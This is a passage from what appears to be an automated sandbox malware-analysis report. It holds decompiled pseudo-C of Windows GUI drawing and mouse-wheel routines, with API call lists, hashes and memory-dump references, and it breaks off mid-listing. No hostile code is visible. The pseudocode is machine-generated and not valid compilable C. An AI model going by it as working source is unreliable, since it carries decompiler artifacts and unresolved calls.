                                  • Opcode ID: d86eb2f476df3c9e5483b63d9c8b3677971dbd68de94036616106a39dcccc6cd
                                  • Instruction ID: 24be03b2b125ad38a0b42588f7149ab459522e8982ca3bd176c987c921b65b6a
                                  • Opcode Fuzzy Hash: d86eb2f476df3c9e5483b63d9c8b3677971dbd68de94036616106a39dcccc6cd
                                  • Instruction Fuzzy Hash: ECD13D70A002189FDF04DFA9D885BAEBBF5FF49304F50846AE905E7392D7789841CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F748, Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E0041F748(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t78;
				struct HDC__* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				char _t85;
				void* _t92;
				struct HDC__* _t115;
				void* _t136;
				struct HDC__* _t160;
				intOrPtr* _t164;
				intOrPtr _t172;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				int* _t184;
				intOrPtr _t186;
				void* _t188;
				void* _t189;
				intOrPtr _t190;

				_t165 = __ecx;
				_t188 = _t189;
				_t190 = _t189 + 0xffffffe4;
				_t184 = __ecx;
				_v8 = __edx;
				_t164 = __eax;
				_t186 =  *((intOrPtr*)(__eax + 0x28));
				_t172 =  *0x41f994; // 0xf
				E0041CE2C(_v8, __ecx, _t172);
				E0041FCD8(_t164);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *((intOrPtr*)(_t186 + 0x10));
				if(_t78 != 0) {
					_push(0xffffffff);
					_push(_t78);
					_t160 =  *(_v8 + 4);
					_push(_t160);
					L004060F0();
					_v12 = _t160;
					_push( *(_v8 + 4));
					L004060C8();
					_v13 = 1;
				}
				_push(0xc);
				_t80 =  *(_v8 + 4);
				_push(_t80);
				L00406058();
				_push(_t80);
				_push(0xe);
				_t82 =  *(_v8 + 4);
				L00406058();
				_t83 = _t82;
				_t84 = _t83 * _t82;
				if(_t84 > 8) {
					L4:
					_t85 = 0;
				} else {
					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
						_t85 = 1;
					} else {
						goto L4;
					}
				}
				if(_t85 == 0) {
					if(E0041FAD4(_t164) == 0) {
						SetStretchBltMode(E0041CD58(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t188);
				_push(0x41f984);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
					E0041FC78(_t164, _t165);
				}
				_t92 = E0041FA18(_t164);
				_t176 =  *0x41f994; // 0xf
				E0041CE2C(_t92, _t165, _t176);
				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E0041FA18(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(E0041F98B);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t115 =  *(_v8 + 4);
						_push(_t115);
						L004060F0();
						return _t115;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t188);
					_push(0x41f919);
					_push( *[fs:eax]);
					 *[fs:eax] = _t190;
					L00405FC8();
					_v28 = E0041D144(0);
					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
					E0041D2E8( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E0041FA18(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
					_t136 = 0;
					_t180 = 0;
					 *[fs:eax] = _t180;
					_push(0x41f95e);
					if(_v32 != 0) {
						_t136 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t136;
				}
			}





























                                  0x0041f748
                                  0x0041f749
                                  0x0041f74b
                                  0x0041f751
                                  0x0041f753
                                  0x0041f756
                                  0x0041f758
                                  0x0041f75b
                                  0x0041f764
                                  0x0041f76b
                                  0x0041f772
                                  0x0041f775
                                  0x0041f779
                                  0x0041f77e
                                  0x0041f780
                                  0x0041f782
                                  0x0041f786
                                  0x0041f789
                                  0x0041f78a
                                  0x0041f78f
                                  0x0041f798
                                  0x0041f799
                                  0x0041f79e
                                  0x0041f79e
                                  0x0041f7a2
                                  0x0041f7a7
                                  0x0041f7aa
                                  0x0041f7ab
                                  0x0041f7b0
                                  0x0041f7b1
                                  0x0041f7b6
                                  0x0041f7ba
                                  0x0041f7c1
                                  0x0041f7c2
                                  0x0041f7c7
                                  0x0041f7d8
                                  0x0041f7d8
                                  0x0041f7c9
                                  0x0041f7cd
                                  0x0041f7d6
                                  0x0041f7dc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041f7d6
                                  0x0041f7e0
                                  0x0041f823
                                  0x0041f830
                                  0x0041f830
                                  0x0041f7e2
                                  0x0041f7ed
                                  0x0041f7fb
                                  0x0041f813
                                  0x0041f813
                                  0x0041f837
                                  0x0041f838
                                  0x0041f83d
                                  0x0041f840
                                  0x0041f84c
                                  0x0041f850
                                  0x0041f850
                                  0x0041f857
                                  0x0041f85c
                                  0x0041f862
                                  0x0041f870
                                  0x0041f959
                                  0x0041f960
                                  0x0041f963
                                  0x0041f966
                                  0x0041f96f
                                  0x0041f971
                                  0x0041f976
                                  0x0041f97a
                                  0x0041f97d
                                  0x0041f97e
                                  0x00000000
                                  0x0041f97e
                                  0x0041f983
                                  0x0041f876
                                  0x0041f878
                                  0x0041f87d
                                  0x0041f882
                                  0x0041f883
                                  0x0041f888
                                  0x0041f88b
                                  0x0041f890
                                  0x0041f89a
                                  0x0041f8aa
                                  0x0041f8e4
                                  0x0041f8e9
                                  0x0041f8eb
                                  0x0041f8ee
                                  0x0041f8f1
                                  0x0041f8fa
                                  0x0041f904
                                  0x0041f904
                                  0x0041f90d
                                  0x00000000
                                  0x0041f913
                                  0x0041f918
                                  0x0041f918

                                  APIs
                                    • Part of subcall function 0041FCD8: 72E7AC50.USER32(00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD2E
                                    • Part of subcall function 0041FCD8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD43
                                    • Part of subcall function 0041FCD8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD4D
                                    • Part of subcall function 0041FCD8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD71
                                    • Part of subcall function 0041FCD8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD7C
                                  • 72E7B410.GDI32(?,?,000000FF), ref: 0041F78A
                                  • 72E7B150.GDI32(?,?,?,000000FF), ref: 0041F799
                                  • 72E7AD70.GDI32(?,0000000C), ref: 0041F7AB
                                  • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 0041F7BA
                                  • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0041F7ED
                                  • SetStretchBltMode.GDI32(?,00000004), ref: 0041F7FB
                                  • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 0041F813
                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041F830
                                  • 72E7A590.GDI32(00000000,00000000,0041F919,?,?,0000000E,00000000,?,0000000C), ref: 0041F890
                                  • SelectObject.GDI32(?,?), ref: 0041F8A5
                                  • SelectObject.GDI32(?,00000000), ref: 0041F904
                                  • DeleteDC.GDI32(00000000), ref: 0041F913
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                  • String ID:
                                  • API String ID: 2051775979-0
                                  • Opcode ID: f9ca03cc71beaee575f2a9fedadbd701382e72aefc89468bb5f352252ddf40c4
                                  • Instruction ID: 3e5013a48adfd762d67b6aa276839b486c811f4c64bc2ac43f556e5ca65c849d
                                  • Opcode Fuzzy Hash: f9ca03cc71beaee575f2a9fedadbd701382e72aefc89468bb5f352252ddf40c4
                                  • Instruction Fuzzy Hash: CD714CB5A00205AFDB40EFADC985F9EB7F8AF08304F11856AB509EB291D738ED45CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041D154, Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E0041D154(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00405FC8();
				_v28 = __eax;
				_push(0);
				L00405FC8();
				_v32 = __eax;
				_push(_t87);
				_push(0x41d2a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L004062C0();
					_v24 = _t37;
					if(_v24 == 0) {
						E0041D09C(__ecx);
					}
					_push(_t87);
					_push(0x41d211);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00405FC0();
					_v20 = _t41;
					if(_v20 == 0) {
						E0041D09C(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x41d218);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L004064F8();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00405FB0();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(E0041D2A9);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























                                  0x0041d155
                                  0x0041d157
                                  0x0041d162
                                  0x0041d163
                                  0x0041d164
                                  0x0041d166
                                  0x0041d169
                                  0x0041d16b
                                  0x0041d170
                                  0x0041d173
                                  0x0041d175
                                  0x0041d17a
                                  0x0041d17f
                                  0x0041d180
                                  0x0041d185
                                  0x0041d188
                                  0x0041d195
                                  0x0041d19c
                                  0x0041d1b6
                                  0x0041d1b8
                                  0x0041d1bd
                                  0x0041d1c4
                                  0x0041d1c6
                                  0x0041d1c6
                                  0x0041d1cd
                                  0x0041d1ce
                                  0x0041d1d3
                                  0x0041d1d6
                                  0x0041d1dc
                                  0x0041d1e0
                                  0x0041d1e1
                                  0x0041d1e4
                                  0x0041d1e5
                                  0x0041d1ea
                                  0x0041d1f1
                                  0x0041d1f3
                                  0x0041d1f3
                                  0x0041d1fa
                                  0x0041d1fd
                                  0x0041d200
                                  0x0041d205
                                  0x0041d208
                                  0x0041d209
                                  0x0041d20b
                                  0x0041d210
                                  0x0041d19e
                                  0x0041d19e
                                  0x0041d1a0
                                  0x0041d1a2
                                  0x0041d1a7
                                  0x0041d1a8
                                  0x0041d1ab
                                  0x0041d1ac
                                  0x0041d1b1
                                  0x0041d21c
                                  0x0041d22b
                                  0x0041d23a
                                  0x0041d261
                                  0x0041d268
                                  0x0041d26f
                                  0x0041d26f
                                  0x0041d276
                                  0x0041d27d
                                  0x0041d27d
                                  0x0041d276
                                  0x0041d284
                                  0x0041d287
                                  0x0041d28a
                                  0x0041d293
                                  0x0041d2a1
                                  0x0041d2a1

                                  APIs
                                  • 72E7A590.GDI32(00000000), ref: 0041D16B
                                  • 72E7A590.GDI32(00000000,00000000), ref: 0041D175
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041D195
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,00000000,0041D2A2,?,00000000,00000000), ref: 0041D1AC
                                  • 72E7AC50.USER32(00000000,00000000,0041D2A2,?,00000000,00000000), ref: 0041D1B8
                                  • 72E7A520.GDI32(00000000,?,?,00000000,0041D211,?,00000000,00000000,0041D2A2,?,00000000,00000000), ref: 0041D1E5
                                  • 72E7B380.USER32(00000000,00000000,0041D218,00000000,0041D211,?,00000000,00000000,0041D2A2,?,00000000,00000000), ref: 0041D20B
                                  • SelectObject.GDI32(?,?), ref: 0041D226
                                  • SelectObject.GDI32(?,00000000), ref: 0041D235
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041D261
                                  • SelectObject.GDI32(?,00000000), ref: 0041D26F
                                  • SelectObject.GDI32(?,00000000), ref: 0041D27D
                                  • DeleteDC.GDI32(?), ref: 0041D293
                                  • DeleteDC.GDI32(?), ref: 0041D29C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                  • String ID:
                                  • API String ID: 956127455-0
                                  • Opcode ID: 8d1fe9c1af0a1f6eeb46be8618a900aa40b0a023af058e787be64daa7972dcee
                                  • Instruction ID: f6596e839cd4c77808f4ea6068f308cd966c793918b8e7e01557e958c39b9838
                                  • Opcode Fuzzy Hash: 8d1fe9c1af0a1f6eeb46be8618a900aa40b0a023af058e787be64daa7972dcee
                                  • Instruction Fuzzy Hash: 5541FFB1E40215BFDB10EAE9CC42FAFB7BCEB09704F51446AF614F7281C67899408B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433260, Relevance: 19.7, APIs: 13, Instructions: 224COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00433260(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t120;
				void* _t171;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr _t205;
				void* _t208;
				intOrPtr _t216;
				signed int _t234;
				void* _t237;
				void* _t239;
				intOrPtr _t240;

				_t237 = _t239;
				_t240 = _t239 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t120 = E004325A4(_v8);
					_push(_t120);
					L004063B8();
					_v16 = _t120;
					_push(_t237);
					_push(0x4334c6);
					_push( *[fs:edx]);
					 *[fs:edx] = _t240;
					GetClientRect(E004325A4(_v8),  &_v32);
					GetWindowRect(E004325A4(_v8),  &_v48);
					MapWindowPoints(0, E004325A4(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t208 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t234 = GetWindowLongA(E004325A4(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t208;
						}
						if((_t234 & 0x00200000) != 0) {
							_t196 =  *0x44de70; // 0x44f8f8
							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t208;
						}
						if((_t234 & 0x00100000) != 0) {
							_t193 =  *0x44de70; // 0x44f8f8
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x44daa0 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x44dab0 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x44dac0 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x44dad0 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041C700( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t216);
					 *[fs:eax] = _t216;
					_push(0x4334cd);
					_push(_v16);
					_t171 = E004325A4(_v8);
					_push(_t171);
					L004064F8();
					return _t171;
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t205 = E00425930(E00425850());
					if(_t205 != 0) {
						_t205 = _v8;
						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
							_t205 = E00425E60(E00425850(), 0, _v8);
						}
					}
					return _t205;
				}
			}




















                                  0x00433261
                                  0x00433263
                                  0x00433269
                                  0x0043326c
                                  0x00433279
                                  0x0043328e
                                  0x00433293
                                  0x00433294
                                  0x00433299
                                  0x0043329e
                                  0x0043329f
                                  0x004332a4
                                  0x004332a7
                                  0x004332b7
                                  0x004332c9
                                  0x004332df
                                  0x004332f4
                                  0x0043330d
                                  0x00433318
                                  0x00433319
                                  0x0043331a
                                  0x0043331b
                                  0x0043332b
                                  0x00433336
                                  0x00433337
                                  0x00433338
                                  0x00433339
                                  0x00433344
                                  0x0043334a
                                  0x00433356
                                  0x0043335b
                                  0x0043335b
                                  0x0043336b
                                  0x00433370
                                  0x00433370
                                  0x00433386
                                  0x00433392
                                  0x00433394
                                  0x00433394
                                  0x004333a1
                                  0x004333a3
                                  0x004333a3
                                  0x004333b0
                                  0x004333b2
                                  0x004333b2
                                  0x004333bb
                                  0x004333bf
                                  0x004333c8
                                  0x004333c8
                                  0x004333d5
                                  0x004333d7
                                  0x004333d7
                                  0x004333e0
                                  0x004333e4
                                  0x004333ed
                                  0x004333ed
                                  0x0043344d
                                  0x0043344d
                                  0x00433466
                                  0x00433471
                                  0x00433472
                                  0x00433473
                                  0x00433474
                                  0x00433485
                                  0x004334a1
                                  0x004334a8
                                  0x004334ab
                                  0x004334ae
                                  0x004334b6
                                  0x004334ba
                                  0x004334bf
                                  0x004334c0
                                  0x004334c5
                                  0x004334cd
                                  0x004334d5
                                  0x004334dd
                                  0x004334e4
                                  0x004334e6
                                  0x004334ed
                                  0x004334f9
                                  0x004334f9
                                  0x004334ed
                                  0x00433504
                                  0x00433504

                                  APIs
                                  • 72E7B080.USER32(00000000), ref: 00433294
                                  • GetClientRect.USER32 ref: 004332B7
                                  • GetWindowRect.USER32 ref: 004332C9
                                  • MapWindowPoints.USER32 ref: 004332DF
                                  • OffsetRect.USER32(?,?,?), ref: 004332F4
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043330D
                                  • InflateRect.USER32(?,00000000,00000000), ref: 0043332B
                                  • GetWindowLongA.USER32 ref: 00433381
                                  • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043344D
                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00433466
                                  • OffsetRect.USER32(?,?,?), ref: 00433485
                                  • FillRect.USER32 ref: 004334A1
                                  • 72E7B380.USER32(00000000,?,004334CD,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004334C0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                  • String ID:
                                  • API String ID: 156109915-0
                                  • Opcode ID: a85cbce6cdd4115c18a511a9fe33bb7146ec71409315ab613f7e6cf49ab6f6c9
                                  • Instruction ID: adecaa6546b22b808243860026d4c071239a2995f3d98b031f9bced86518c823
                                  • Opcode Fuzzy Hash: a85cbce6cdd4115c18a511a9fe33bb7146ec71409315ab613f7e6cf49ab6f6c9
                                  • Instruction Fuzzy Hash: B991E571E00608AFDB01DFA9C985EEEB7F9AF09314F1541AAF914F7251C779AE008B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406780, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406780(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                  0x00406787
                                  0x00406789
                                  0x0040678b
                                  0x0040679d
                                  0x004067ac
                                  0x004067b8
                                  0x004067c4
                                  0x004067c9
                                  0x004067e8
                                  0x004067cf
                                  0x004067df
                                  0x004067df
                                  0x004067ed
                                  0x0040680a
                                  0x004067f3
                                  0x00406803
                                  0x00406803
                                  0x00406817

                                  APIs
                                  • FindWindowA.USER32 ref: 00406798
                                  • RegisterClipboardFormatA.USER32 ref: 004067A4
                                  • RegisterClipboardFormatA.USER32 ref: 004067B3
                                  • RegisterClipboardFormatA.USER32 ref: 004067BF
                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004067D7
                                  • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 004067FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                  • API String ID: 1416857345-3736581797
                                  • Opcode ID: ebc77da63279e8c923901a8f4573aa9d47a561bb278150ac055fe8b94d012605
                                  • Instruction ID: 373dc2d44cffb1d4e10de33ccc24215450a4b6518063546f2f673c0df03fd65f
                                  • Opcode Fuzzy Hash: ebc77da63279e8c923901a8f4573aa9d47a561bb278150ac055fe8b94d012605
                                  • Instruction Fuzzy Hash: 70113371241305AFE710AF65DC41B6AB7A8EF45714F22843BF842BB2C1D6B89C60CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00425E60, Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E00425E60(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t78;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E004325A4(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E004325A4(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E004325A4(_v8);
					_push(_t55);
					L004063B8();
					_v12 = _t55;
					_push(_t120);
					_push(0x425fbb);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E004325A4(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							_t78 = GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E004120F0(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00425A98( &_v56, 2);
					E004259EC(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x425fc2);
					_push(_v12);
					_t74 = E004325A4(_v8);
					_push(_t74);
					L004064F8();
					return _t74;
				}
			}






















                                  0x00425e61
                                  0x00425e63
                                  0x00425e69
                                  0x00425e6b
                                  0x00425e6e
                                  0x00425e7b
                                  0x00425e83
                                  0x00425fc8
                                  0x00425e89
                                  0x00425e96
                                  0x00425eab
                                  0x00425eb3
                                  0x00425eb8
                                  0x00425eb9
                                  0x00425ebe
                                  0x00425ec3
                                  0x00425ec4
                                  0x00425ec9
                                  0x00425ecc
                                  0x00425ed6
                                  0x00425ed7
                                  0x00425ed8
                                  0x00425ed9
                                  0x00425eda
                                  0x00425edd
                                  0x00425eea
